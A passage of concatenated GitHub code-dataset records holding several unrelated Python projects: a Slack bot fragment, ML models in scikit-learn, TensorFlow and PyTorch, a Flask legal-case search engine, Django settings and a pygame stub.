self.commands[_CMD]()\n else:\n response += \"I do not understand the command: _*\" + _CMD + \"*_. \" + self._get_help() \n return response \n\n##\n def _get_artifact_info(self, formatted_id, _attribute):\n print('_get_artifact_info' + formatted_id + _attribute)\n _artifact = self._get_artifact_type(formatted_id)\n _rallyresp = self.AYX._artifact_info(formatted_id, _artifact, _attribute)\n print('_get_artifact_info' + ' ' + _artifact)\n return _rallyresp['msg']\n \n##\n def _get_artifact_type(self, formatted_id):\n _K = regex.split('([\\D]+)', formatted_id)[1]\n return self.ARTIFACT_TYPE[_K]\n \n## \n def _get_help(self):\n response = \"I currently support the following commands:\\r\\n\"\n for command in self.commands:\n response += command + '\\r\\n'\n return response \n\n##\n def _quit(self):\n sys.exit(1)\n","repo_name":"ozzieD/rally_slackbot","sub_path":"src/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22703138972","text":"import pandas as pd\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\nclass Model:\n def __init__(self):\n self.model = None\n \n\n def _read_dataset(self):\n url = \"./resource/iris.csv\"\n names = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\n return pd.read_csv(url, names=names)\n \n def _get_train_test(self, dataset):\n # Split-out validation dataset\n array = dataset.values\n X = array[:,0:4]\n Y = array[:,4]\n validation_size = 0.20\n seed = 7\n return model_selection.train_test_split(X, Y, test_size=validation_size, random_state=seed)\n\n def train(self):\n data = self._read_dataset()\n X_train, X_validation, Y_train, Y_validation = self._get_train_test(data)\n self.model = LogisticRegression()\n self.model.fit(X_train, Y_train)\n predictions = self.predict(X_validation)\n # print(accuracy_score(Y_validation, predictions))\n return self\n \n def predict(self, x):\n return self.model.predict(x)\n\nif __name__ == \"__main__\":\n Model().train()","repo_name":"nyutal/flaskRestML","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25629070745","text":"import re\nimport string\nimport textwrap\n\nimport pdfplumber\nfrom flask import Flask, render_template, url_for, request, redirect\n\nimport matplotlib.pyplot as plt\nfrom nltk import word_tokenize, PorterStemmer, WordNetLemmatizer\nfrom nltk.corpus import stopwords\nfrom wordcloud import WordCloud\n\nimport math\n\n\ndocIndexes = []\nbm25Values = []\nvocabulary = dict()\nidfs = dict()\ndocFrequencies = dict()\nabstractsDictionary = dict()\ngAbstract = 'CIVIL APPEAL NO.1474. OF 2015 (Against the judgment dated _16.12.2014 passed by the Peshawar High Court, Peshawar in Writ Petition No.162 of 2014).'\nk = 5\nN = 1000\n\n\ndef extractAbstracts():\n file = open('abstracts.txt', 'r')\n for line in file:\n line = line.strip('\\n')\n data = line.split(':')\n abstractsDictionary[data[0]] = data[1]\n\ndef makeWordCloud(wordsList):\n if len(wordsList) > 0:\n # convert list to string and generate\n unique_string = (\" \").join(wordsList)\n wordcloud = WordCloud(width=400, height=350).generate(unique_string)\n plt.figure(figsize=(15, 8))\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.savefig(\"Static\\\\cloud\" + \".png\", bbox_inches='tight')\n # plt.show()\n plt.close()\n\n\ndef getTokensForDocument(docName):\n words = []\n data = docName.split('/')\n file = open('File cases tokens\\\\' + data[1] + '.txt')\n if file:\n for line in file:\n words.append(line.strip('\\n'))\n return words\n\ndef getAbstract(filename):\n data = filename.split('_')\n return 'Here .... ' + abstractsDictionary[data[0]]\n\ndef extractAbstractOfDocument(docName):\n abstract = \"\"\n try:\n with pdfplumber.open('AllCases\\\\' + docName) as pdf:\n page = pdf.pages[0]\n text = page.extract_text()\n # onAppeal = re.findall('\\(On\\s[AaPpPpEeAaLl]{6}[^\\)]*\\)', text)\n # if len(onAppeal) > 0:\n # return onAppeal[0]\n ca = re.findall('C[iIvViIlL]{4}[^\\)]*\\)', text)\n if len(ca) > 0:\n return ca[0]\n cp = re.findall('C[IiVviIlL]{4}[^\\)]*\\)', text)\n if len(cp) > 0:\n return cp[0]\n crl = re.findall('C[RrIiMmIiNnAaLl]{7}[^\\)]*\\)', text)\n if len(crl) > 0:\n return crl[0]\n crl = re.findall('C[RrIiMmIiNnAaLl]{7}[^\\)]*\\)', text)\n if len(crl) > 0:\n return crl[0]\n hr = re.findall('H[UuMmAaNn]{4}[^\\)]*\\)', text)\n if len(hr) > 0:\n return hr[0]\n hr = re.findall('H[.RC]{4}[^\\)]*\\)', text)\n if len(hr) > 0:\n return hr[0]\n smc = re.findall('S[uUoO]{2}[^\\)]*\\)', text)\n if len(smc) > 0:\n return smc[0]\n smc = re.findall('S[\\.M\\.C]{4}[^\\)]*\\)', text)\n if len(smc) > 0:\n return smc[0]\n except:\n print('here')\n return abstract\n return abstract\n\n\ndef getTermFrequency(vocId, docId):\n file = open('termFrequency.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split('\\t')\n vId = sep[0]\n if vId == vocId:\n values = sep[1].split(' ')\n for item in values:\n sep2 = item.split(':')\n if docId == sep2[0]:\n return float(sep2[1])\n return 0\n\n\ndef L2NormOfVector(vector):\n result = 0\n total = 0\n for value in vector:\n total = total + (value * value)\n result = math.sqrt(total)\n return result\n\n\ndef countWordsInText(word, text):\n tokens = text.split(' ')\n count = 0\n for token in tokens:\n if token == word:\n count += 1\n return count\n\n\ndef getVocabularyId(voc):\n try:\n return vocabulary[voc]\n except:\n return '0'\n\n\ndef getBm25ForDoc(vocId, docId):\n for item in bm25Values:\n if item[0] == vocId:\n sep = item[1].split(' ')\n for item2 in sep:\n breakItem = item2.split(':')\n if breakItem[0] == docId:\n return float(breakItem[1])\n return 0.0\n\n\ndef getNormalizedVector(vector):\n l2Norm = L2NormOfVector(vector)\n normalized = []\n if l2Norm > 0:\n for value in vector:\n val = float(value / l2Norm)\n normalized.append(val)\n return normalized\n return vector\n\n\ndef getBm25ForQuery(word, vocId, docId, query):\n cw_query = countWordsInText(word, query)\n bm25ForDoc = getBm25ForDoc(vocId, docId)\n bm25 = cw_query * bm25ForDoc\n return bm25\n\n\ndef computeDotProduct(vector1, vector2):\n result = 0\n for i in range(len(vector1)):\n result += vector1[i] * vector2[i]\n return result\n\n\ndef runQuery(queryText):\n relevantdocs = []\n relevantAbstracts = []\n\n queries = [queryText]\n extractAbstracts()\n\n print(abstractsDictionary)\n\n # Read document frequencies\n file = open('documentFrequency.txt', 'r')\n if file:\n for line in file:\n data = line.strip('\\n')\n sep = data.split(' ')\n vocId = sep[0]\n df = int(sep[1])\n docFrequencies[vocId] = df\n\n # Read document indexes\n file = open('documentIndex.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split(' ')\n docIndexes.append(sep)\n file.close()\n\n # Read bm25\n file = open('bm25.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split('\\t')\n bm25Values.append(sep)\n file.close()\n\n # Read vocabulary\n file = open('sortedVocabularyWithNames.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split(' ')\n vocabulary[sep[1]] = sep[0]\n file.close()\n\n # Read idfs\n file = open('idf.txt', 'r')\n for line in file:\n data = line.strip('\\n')\n sep = data.split(' ')\n idfs[sep[0]] = float(sep[1])\n\n file.close()\n queryIdx = 1\n\n file2 = open('cosineScores(bm25).txt', 'w')\n\n for query in queries:\n\n docNames = []\n scores = []\n\n query = query.lower()\n query = query.replace('\\n', ' ')\n query = query.replace('™', '')\n query = query.replace('–', '')\n query = query.replace('•', '')\n\n query = query.translate(str.maketrans('', '', string.punctuation))\n query = re.sub(r'\\b\\w{1,3}\\b', '', query)\n query = re.sub(r'\\s+', ' ', query)\n stop_words = set(stopwords.words('english'))\n word_tokens = word_tokenize(query)\n filtered_sentence = [w for w in word_tokens if not w.lower() in stop_words]\n queryTokens = []\n ps = PorterStemmer()\n wordnet_lemmatizer = WordNetLemmatizer()\n for item in filtered_sentence:\n item2 = ps.stem(item)\n queryTokens.append(item2)\n\n # Read tokens for each document\n for item in docIndexes:\n\n wordsSet = set()\n docScoreVector = []\n\n docId = item[0]\n docName = 'File cases tokens\\\\' + item[1] + '.txt'\n file = open(docName, 'r', encoding=\"ISO-8859-1\")\n\n for line in file:\n token = line.strip('\\n')\n if token in queryTokens:\n wordsSet.add(token)\n\n # Document Part\n for word in wordsSet:\n bm25_val = 0\n vocId = getVocabularyId(word)\n if vocId != '0':\n bm25_val = getBm25ForQuery(word, vocId, docId, query)\n docScoreVector.append(float(bm25_val))\n\n bm25Score = 0\n for item in docScoreVector:\n bm25Score += item\n\n if bm25Score > 0:\n scores.append(round(bm25Score, 3))\n docNames.append(docName)\n\n if len(scores) > 0:\n for i in range(len(scores) - 1):\n for j in range(len(scores) - i - 1):\n if scores[j] < scores[j + 1]:\n temp = scores[j]\n scores[j] = scores[j + 1]\n scores[j + 1] = temp\n temp = docNames[j]\n docNames[j] = docNames[j + 1]\n docNames[j + 1] = temp\n\n i = 0\n abstract = ''\n while i < len(scores) and i < 100:\n separate = docNames[i].split('.txt')\n onlyPdf = separate[0].split('File cases tokens\\\\')\n\n if str('AllCases/' + onlyPdf[1]) not in relevantdocs:\n relevantdocs.append('AllCases/' + onlyPdf[1])\n abstract = extractAbstractOfDocument(onlyPdf[1])\n\n if len(abstract) > 170:\n abstract = textwrap.shorten(abstract, width=170, placeholder=\"...\")\n if abstract == '':\n abstract = getAbstract(onlyPdf[1])\n else:\n relevantAbstracts.append(abstract)\n file2.write(docNames[i] + ' ' + str(scores[i]) + '\\n')\n i += 1\n\n else:\n file2.write('No Documents Found\\n')\n\n file2.write('\\n')\n\n file2.close()\n print('\\n > All data is saved into text file ...')\n return relevantdocs, relevantAbstracts\n\n\napp = Flask(__name__)\npage1docs = []\npage1Abs = []\npage2docs = []\npage2Abs = []\npage3docs = []\npage3Abs = []\npage4docs = []\npage4Abs = []\npage5docs = []\npage5Abs = []\npage6docs = []\npage6Abs = []\npage7docs = []\npage7Abs = []\npage8docs = []\npage8Abs = []\npage9docs = []\npage9Abs = []\npage10docs = []\npage10Abs = []\nrelevantDocs = []\nrelevantAbstracts = []\nnoOfPages = 0\nisYes = True\nprevQuery = \"\"\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if request.method == 'POST':\n\n global noOfPages, relevantAbstracts, relevantDocs, isYes, prevQuery\n\n pageNo = request.form['pageNo']\n\n query = request.form['query']\n if query != prevQuery:\n isYes = True\n page1docs.clear()\n page1Abs.clear()\n page2docs.clear()\n page2Abs.clear()\n page3docs.clear()\n page3Abs.clear()\n page4docs.clear()\n page4Abs.clear()\n page5docs.clear()\n page5Abs.clear()\n page6docs.clear()\n page6Abs.clear()\n page7docs.clear()\n page7Abs.clear()\n page8docs.clear()\n page8Abs.clear()\n page9docs.clear()\n page9Abs.clear()\n page10docs.clear()\n page10Abs.clear()\n relevantDocs.clear()\n relevantAbstracts.clear()\n\n print(noOfPages)\n print(isYes)\n print(pageNo)\n\n if isYes:\n relevantDocs, relevantAbstracts = runQuery(query)\n\n k = 0\n for doc in relevantDocs:\n if k < 10:\n page1docs.append(doc)\n page1Abs.append(relevantAbstracts[k])\n elif k < 20:\n page2docs.append(doc)\n page2Abs.append(relevantAbstracts[k])\n elif k < 30:\n page3docs.append(doc)\n page3Abs.append(relevantAbstracts[k])\n elif k < 40:\n page4docs.append(doc)\n page4Abs.append(relevantAbstracts[k])\n elif k < 50:\n page5docs.append(doc)\n page5Abs.append(relevantAbstracts[k])\n elif k < 60:\n page6docs.append(doc)\n page6Abs.append(relevantAbstracts[k])\n elif k < 70:\n page7docs.append(doc)\n page7Abs.append(relevantAbstracts[k])\n elif k < 80:\n page8docs.append(doc)\n page8Abs.append(relevantAbstracts[k])\n elif k < 90:\n page9docs.append(doc)\n try:\n page9Abs.append(relevantAbstracts[k])\n except:\n page9Abs.append(gAbstract)\n elif k < 100:\n page10docs.append(doc)\n try:\n page10Abs.append(relevantAbstracts[k])\n except:\n page10Abs.append(gAbstract)\n\n k += 1\n prevQuery = query\n noOfPages = math.ceil(len(relevantDocs) / 10)\n isYes = False\n\n if pageNo == '1':\n wordsListForWordCloud = []\n for doc in page2docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page2docs), queryText=query,\n docs=page2docs, abstracts=page2Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '2':\n wordsListForWordCloud = []\n for doc in page3docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page3docs), queryText=query,\n docs=page3docs, abstracts=page3Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '3':\n wordsListForWordCloud = []\n for doc in page4docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page4docs), queryText=query,\n docs=page4docs, abstracts=page4Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '4':\n wordsListForWordCloud = []\n for doc in page5docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page5docs), queryText=query,\n docs=page5docs, abstracts=page5Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '5':\n wordsListForWordCloud = []\n for doc in page6docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page6docs), queryText=query,\n docs=page6docs, abstracts=page6Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '6':\n wordsListForWordCloud = []\n for doc in page7docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page7docs), queryText=query,\n docs=page7docs, abstracts=page7Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '7':\n wordsListForWordCloud = []\n for doc in page8docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page8docs), queryText=query,\n docs=page8docs, abstracts=page8Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '8':\n wordsListForWordCloud = []\n for doc in page9docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page9docs), queryText=query,\n docs=page9docs, abstracts=page9Abs, pageNo=int(pageNo) + 1)\n elif pageNo == '9':\n wordsListForWordCloud = []\n for doc in page10docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page10docs), queryText=query,\n docs=page10docs, abstracts=page10Abs, pageNo=int(pageNo) + 1)\n else:\n wordsListForWordCloud = []\n for doc in page1docs:\n wordsInDoc = getTokensForDocument(doc)\n for word in wordsInDoc:\n wordsListForWordCloud.append(word)\n makeWordCloud(wordsListForWordCloud)\n return render_template('fetch_docs.html', noOfPages=noOfPages, len=len(page1docs), queryText=query,\n docs=page1docs, abstracts=page1Abs, pageNo=int(pageNo) + 1)\n\n else:\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"SyedAhtsham/Pakistani-Law-Cases-Search-Engine","sub_path":"myproject/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"928885490","text":"import tensorflow as tf\n\nclass BiLSTM_Attention(object):\n def __init__(self, seq_len, \n vocab_size,\n embedding_dim,\n hidden_size,\n attention_size,\n label_size,\n learning_rate,\n random_embedding=True,\n word_embedding=None):\n self.seq_len = seq_len\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.hidden_size= hidden_size\n self.attention_size = attention_size\n self.label_size = label_size\n self.learning_rate = learning_rate\n self.random_embedding = random_embedding\n self.word_embedding = word_embedding\n\n self._build_graph()\n\n def _build_graph(self):\n self.input_x = tf.placeholder(tf.int32, shape=[None, self.seq_len], name=\"input_x\")\n self.input_y = tf.placeholder(tf.int32, shape=[None, self.label_size], name=\"input_y\")\n self.dropout_keep_prob = tf.placeholder(tf.float32, name=\"dropout_keep_prob\") \n\n with tf.name_scope(\"embedding\"):\n if not self.random_embedding:\n self.embedding_table = tf.Variable(tf.cast(self.word_embedding, \\\n dtype=tf.float32, name=\"word2vec\"), \n name=\"embedding_table\")\n else:\n self.embedding_table = tf.Variable(tf.random.uniform([self.vocab_size, self.embedding_dim], \\\n -1.0, 1.0), \n name=\"embedding_table\")\n input_embedding = tf.nn.embedding_lookup(self.embedding_table, self.input_x)\n\n hiddens, _ = self.bilstm(input_embedding, self.hidden_size, self.seq_len)\n x_embedding = tf.concat(hiddens, axis=-1) # (batch_size, max_time, hidden_size*2)\n attention_output, alphas= self.attention(x_embedding, self.attention_size)\n attention_output = tf.nn.dropout(attention_output, self.dropout_keep_prob)\n \n # 全连接层\n with tf.variable_scope(\"full_net\"):\n attention_output_shape = attention_output.shape\n W = tf.Variable(tf.random_normal(shape=[attention_output_shape[-1].value, self.label_size]\\\n , stddev=0.1), \n name='W')\n b = tf.Variable(tf.random_normal([self.label_size], stddev=0.1), name=\"b\")\n full_output = tf.matmul(attention_output, W) + b\n self.logits = tf.nn.dropout(full_output, self.dropout_keep_prob)\n self.prob = tf.nn.softmax(self.logits)\n self.prediction = tf.argmax(self.prob, axis=1)\n\n # y = tf.one_hot(self.input_y, self.label_size)\n loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits,\\\n labels=self.input_y)\n self.loss = tf.reduce_mean(loss, axis=0)\n # self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate)\n self.grads_and_vars = self.optimizer.compute_gradients(self.loss)\n # correct_prediction = tf.equal(tf.cast(self.prediction, tf.int32), self.input_y)\n correct_prediction = tf.equal(self.prediction, tf.argmax(self.input_y, 1))\n self.acc = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), axis=0, name=\"acc\")\n\n def attention(self, inputs, attention_size, mask=True):\n with tf.variable_scope(\"attention\"):\n # hidden_size = tf.shape(inputs)[-1]\n hidden_size = inputs.shape[2].value\n W = tf.Variable(tf.random_normal(shape=[hidden_size, attention_size], stddev=0.1))\n b = tf.Variable(tf.random_normal(shape=[attention_size], stddev=0.1))\n u = tf.Variable(tf.random_normal(shape=[1, attention_size], stddev=0.1))\n\n v = tf.tanh(tf.matmul(inputs, W) + b) # (batch_size, len, attention_size)\n uv = tf.reduce_sum(tf.matmul(v, tf.transpose(u, [1,0])), axis=-1)\n alphas = tf.nn.softmax(uv, axis=-1)\n\n output = tf.reduce_sum(inputs * tf.expand_dims(alphas, -1), 1)\n\n return output, alphas\n\n def rnn_cell(self, hidden_size, name, cell_type='lstm'):\n with tf.variable_scope(name):\n if cell_type==\"lstm\":\n cell = tf.contrib.rnn.LSTMCell(num_units=hidden_size)\n else:\n cell = tf.contrib.rnn.GRUCell(num_units=hidden_size)\n return cell \n\n def bilstm(self, x, hidden_size, seq_len, cell_type=\"lstm\", name=\"bilstme\"):\n with tf.name_scope(name):\n cell_fw = self.rnn_cell(hidden_size, \"fw_\"+name) \n cell_bw = self.rnn_cell(hidden_size, \"bw_\"+name) \n hidden_states, last_states = tf.nn.bidirectional_dynamic_rnn(cell_fw=cell_fw, \n cell_bw=cell_bw, \n inputs = x,\n # sequence_length=seq_len,\n dtype=tf.float32,\n scope=name)\n return hidden_states, last_states\n\n","repo_name":"Fisher87/ai_explore","sub_path":"nlp_explore/task/classify/bilstm_attention.py","file_name":"bilstm_attention.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"61"} +{"seq_id":"38855214321","text":"import mdl\n\ndef run(filename, outfile):\n \"\"\"\n This function runs an mdl script\n \"\"\"\n p = mdl.parseFile(filename)\n\n if p:\n (commands, symbols) = p\n else:\n print(\"Parsing failed.\")\n return\n\n view = [0,\n 0,\n 1];\n ambient = [50,\n 50,\n 50]\n light = [[0.5,\n 0.75,\n 1],\n [255,\n 255,\n 255]]\n\n color = [0, 0, 0]\n\n step_3d = 100\n consts = ''\n coords = []\n coords1 = []\n symbols['.white'] = ['constants',\n {'red': [0.2, 0.5, 0.5],\n 'green': [0.2, 0.5, 0.5],\n 'blue': [0.2, 0.5, 0.5]}]\n reflect = '.white'\n\n print(symbols)\n constsstr = \"__DEF__\\n\"\n for symbolname, symbolval in symbols.items():\n if symbolval[0] == 'constants':\n constsstr += '__CONST__\\n'\n constsstr += symbolname + ' '\n symbolval = symbolval[1];\n for c in symbolval:\n for i in range(3):\n constsstr += str(symbolval[c][i]) + ' '\n constsstr += '\\n'\n elif symbolval[0] == 'knob':\n constsstr += '__KNOB__\\n'\n constsstr += symbolname + '\\n'\n \n print(constsstr)\n for command in commands:\n print(command)\n commandsstr = \"__RUN__\\n\"\n for command in commands:\n if command['op'] != 'constants':\n commandsstr += '__OP__\\n'\n commandsstr += command['op'] + '\\n'\n commandsstr += 'args '\n if command.get('args') != None:\n for arg in command['args']:\n commandsstr += str(arg) + ' '\n commandsstr += '\\n'\n if command.get('func') != None:\n commandsstr += 'func ' + str(command['func']) + '\\n'\n for key in command:\n if key != 'op' and key != 'args' and key != 'func' and command[key] != None:\n commandsstr += key + ' '\n commandsstr += str(command[key]) + '\\n'\n print(commandsstr)\n\n with open(outfile, \"w\") as f:\n f.write(constsstr)\n f.write(commandsstr)\n f.close()","repo_name":"cnelson20/graphics_final_project","sub_path":"src/py/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43398966012","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'ty4wmd=&yopk#u*q4l)00#2!#e15a^@-z_tv(pc3t^edv)sh&r'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = ['iat-bookshelf.herokuapp.com', 'localhost']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n'grappelli',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'bookshelf.modules.dashboard',\n 'bookshelf.modules.api',\n\n)\n\nROOT_URLCONF = 'bookshelf.config.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'bookshelf.config.apache.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nPROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nAPP_ROOT = os.path.join(PROJECT_ROOT, 'modules/dashboard')\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')\nSTATIC_URL = '/static/'\n\n\n# Extra lookup directories for collectstatic to find static files\nSTATICFILES_DIRS = (\n os.path.join(APP_ROOT, 'static'),\n)\n\nGRAPPELLI_ADMIN_TITLE = \"Bookshelf Interface\"\nLOGIN_REDIRECT_URL = \"/dashboard\"","repo_name":"inderpartap/digital-bookshelf","sub_path":"bookshelf/config/settings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"40501822439","text":"#!/usr/bin/env python3\n\nimport torch\nimport sys\nimport torch.distributed as dist\nfrom data.data import load_data\nfrom models.utils import init_multi_gpu_model\nimport utils.utils as utils\nfrom utils.flags import Flags\n\n\ndef run_training_process_on_given_gpu(rank, data, queue):\n \"\"\"Run training/evaluation on given gpu id (rank).\n \"\"\"\n try:\n args = data.args\n model = init_multi_gpu_model(rank, args)\n protocol = utils.Protocol(rank, args, model, data)\n train_dataloader = data.get_train_dataloader()\n eval_dataloader = data.get_eval_dataloader()\n \n for epoch in range(1 + args.load_from_epoch, 1 + args.load_from_epoch + args.num_epochs):\n protocol.start_epoch(epoch) \n if not args.eval_only:\n protocol.set_to_train_mode()\n for step, batch in enumerate(train_dataloader, 1):\n model_input, model_target_output = model.do_batch_processing(batch)\n model.optimizer.zero_grad()\n with torch.autocast(device_type=args.device, dtype=args.dtype, enabled=args.auto_mixed_precision):\n model_output = model(*model_input)\n loss = model.do_backpropagation(model_output, model_target_output)\n \n if step % args.calc_every == 0 or step == data.total_steps_train:\n\n protocol.show_progress(rank, epoch, step, data.total_steps_train, loss)\n protocol.finish_epoch(rank, epoch, model)\n\n if args.eval:\n protocol.set_to_eval_mode()\n\n with torch.no_grad():\n for step, batch in enumerate(eval_dataloader, 1):\n model_input, model_target_output = model.do_batch_processing(batch)\n with torch.autocast(device_type=args.device, dtype=args.dtype, enabled=args.auto_mixed_precision):\n model_output = model(*model_input)\n protocol.evaluation.evaluate_step(model_output, model_target_output)\n if step % args.calc_every == 0 or step == data.total_steps_eval:\n protocol.show_progress(rank, epoch, step, data.total_steps_eval) \n protocol.finish_epoch(rank, epoch) \n protocol.finish_benchmark()\n\n except KeyboardInterrupt:\n protocol.cancel_procedure()\n except RuntimeError as local_error_report:\n protocol.error_procedure(local_error_report, queue)\n\n \n\ndef main():\n flags = Flags()\n args = flags.args\n try:\n if args.live_plot:\n _ = utils.run_live_plot_thread(args.num_gpus, args.refresh_interval)\n\n data = load_data(args)\n\n if args.pred_pic_label:\n model = init_multi_gpu_model(0, args)\n model.predict_label_for_single_picture()\n\n elif args.distributed:\n queue = torch.multiprocessing.get_context('spawn').Queue()\n torch.multiprocessing.spawn(\n run_training_process_on_given_gpu, args=(data, queue), nprocs=args.num_gpus, join=True\n )\n else:\n run_training_process_on_given_gpu(0, data, None)\n except KeyboardInterrupt:\n pass\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"aime-team/pytorch-benchmarks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"39119999029","text":"from flask import Blueprint\nfrom database import Query\nfrom database import visit_occurence_sql, person_sql\n\nfrom app import db\n\nstats = Blueprint('stats', __name__)\n\n# 환자 통계 /stats/patient\n# In : None\n# Out: {\"통계 종류\": \"통계 값\"}\n@stats.route('/patient', methods = ['GET'])\ndef patient():\n q = Query(db)\n result = {}\n for type, query in visit_occurence_sql.stats_operation.items():\n q.execute(query)\n fetch = q.fetch()\n result.setdefault(type, fetch)\n q.close()\n del q\n return result\n\n# 방문 통계 /stats/visit\n# In : None\n# Out: {\"통계 종류\": \"통계 값\"}\n@stats.route('/visit', methods = ['GET'])\ndef visit():\n q = Query(db)\n result = {}\n for type, query in person_sql.stats_operation.items():\n q.execute(query)\n fetch = q.fetch()\n result.setdefault(type, fetch)\n q.close()\n del q\n return result\n","repo_name":"gwanryo/sturdy-guacamole","sub_path":"server/route/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33066014209","text":"import pygame\n\n# 游戏的初始化\npygame.init()\n# 创建游戏窗口 480*700 返回屏幕对象\nscreen = pygame.display.set_mode((480, 700))\n# 绘制背景图像\nbg = pygame.image.load(\"./images/background.png\")\nscreen.blit(bg, (0, 0))\n\n# 绘制英雄图像\nhero = pygame.image.load(\"./images/me1.png\")\nscreen.blit(hero, (150, 300))\n\n# 可以在所有绘制工作完成之后,统一调用update方法\npygame.display.update()\n\n# 创建时钟对象\nclock = pygame.time.Clock()\n\n# 创建英雄矩形 记录英雄的初始位置\nhero_rect = pygame.Rect(150, 300, 102, 126)\n\n# 